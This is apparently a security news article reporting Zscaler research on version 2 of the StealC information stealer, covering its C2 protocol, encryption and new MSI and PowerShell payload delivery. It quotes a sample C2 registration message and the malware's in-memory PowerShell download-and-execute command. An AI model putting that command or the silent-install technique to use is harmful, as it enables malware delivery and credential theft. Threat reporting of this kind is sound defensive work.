New StealC V2 Expands to Include Microsoft Software Installer Packages and PowerShell Scripts

StealC, a popular information stealer and malware downloader that has been active since January 2023, has received a significant update with the introduction of version 2 (V2) in March 2025.

This latest iteration brings substantial enhancements to the malware’s capabilities, including a streamlined command-and-control (C2) communication protocol and the integration of RC4 encryption in recent variants, making it more difficult to detect and analyze.

One of the most notable improvements in StealC V2 is the expansion of its payload delivery options.

While the previous version could only execute EXE and DLL files, the new version can now deliver malicious payloads through Microsoft Software Installer (MSI) packages and PowerShell scripts, significantly broadening its attack surface and potential infection vectors.

The malware also features a redesigned control panel with an integrated builder, allowing threat actors to customize payload delivery rules based on various factors including geolocation, hardware IDs (HWID), and installed software.

Additional enhancements include multi-monitor screenshot capture capabilities, a unified file grabber, and server-side bruteforcing for credentials.

Zscaler researchers identified that StealC V2 employs a sophisticated JSON-based communication protocol for its C2 infrastructure.

The researchers noted that the malware performs several validation steps before execution, including checking for duplicate instances and verifying that the system language is not one spoken in the Commonwealth of Independent States (CIS), indicating a potential avoidance of targeting these regions.

The infection process begins with an initial request to register the infection, containing a bot ID (HWID) and botnet ID (build), as shown in the following example code:-

{
build: "main1",
hwid: "A9CAA24C-E7F3-3B20-0F54-4BE8A7DC2330",
type: "create"
}

Advanced Payload Delivery Mechanisms

The new payload delivery capabilities in StealC V2 represent a significant evolution in the malware’s functionality.

For executing MSI packages, the malware uses the msiexec.exe utility with the silent /passive parameter to minimize user interaction, making installation stealthier.

If the initial installation fails, the malware will retry up to 10 times, demonstrating its persistence.

For PowerShell script execution, StealC V2 utilizes a more direct approach with the command: powershell.exe -nop -c iex(New-Object Net.WebClient).DownloadString('[payload]').

This method allows the malware to execute remote scripts directly in memory without writing them to disk, making detection more challenging.

Unlike with MSI packages and executable files, StealC V2 does not attempt to retry failed PowerShell script executions.

These advanced delivery mechanisms allow threat actors to deploy StealC V2 through a variety of methods, effectively bypassing security controls that might be focused on traditional executable files.

The ability to use legitimate Windows utilities like msiexec.exe and PowerShell creates opportunities for the malware to blend in with normal system operations, highlighting the increasingly sophisticated tactics employed by modern malware authors.

Are you from the SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.

The post New StealC V2 Expands to Include Microsoft Software Installer Packages and PowerShell Scripts appeared first on Cyber Security News.